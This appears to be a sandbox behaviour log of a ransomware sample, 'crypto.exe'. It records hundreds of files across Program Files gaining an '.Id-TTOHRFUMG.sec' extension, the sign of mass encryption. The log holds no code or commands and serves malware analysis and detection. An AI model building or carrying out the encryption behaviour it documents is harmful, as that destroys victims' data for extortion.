File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00440_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mousedown.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\bn.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00687_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libddummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0332268.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libgrey_yuv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\EST5EDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0093905.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01472_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_output\libglwin32_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\OLJRNL.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_vi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239943.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\TexturedBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7FR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEB11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MsMpCom.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00152_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02270_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\New_Skins.url.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jsdt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DissolveNoise.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QRYINT32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ps.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Hobart.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MAPISHELL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DVDHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198021.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_bkg_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libmod_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\ahclient.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SNIPE.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Cayenne.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195320.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105298.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382947.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART13.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00130_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187825.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18201_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\DOCS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\CircleIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\deployJava1.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01191_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Omsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01298_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME26.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02386_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01292_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02082_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpAsDesc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_de.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099159.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105384.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233512.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\DELIMWIN.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-util-enumerations.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099166.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239973.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01293_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JNGLE_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsViewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.JP.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Majuro.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SETLANG_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYi.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00388_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\wlsrvc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341654.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00191_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FORM98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\SystemV\EST5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Phone.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SAVE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\visualization\libglspectrum_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01748_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205466.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIcon.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\libarchive_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\corner.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\picturePuzzle.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14980_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01658_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\Management.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-keymap.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\libvlc.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WORDREP.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00253_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\VOLTAGE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\sbdrop.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\da.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\cmm\sRGB.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\management-agent.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21335_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\CHIMES.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BlackRectangle.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_am.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Journal.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14791_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Brussels.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21297_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF.Id-TTOHRFUMG.sec	crypto.exe
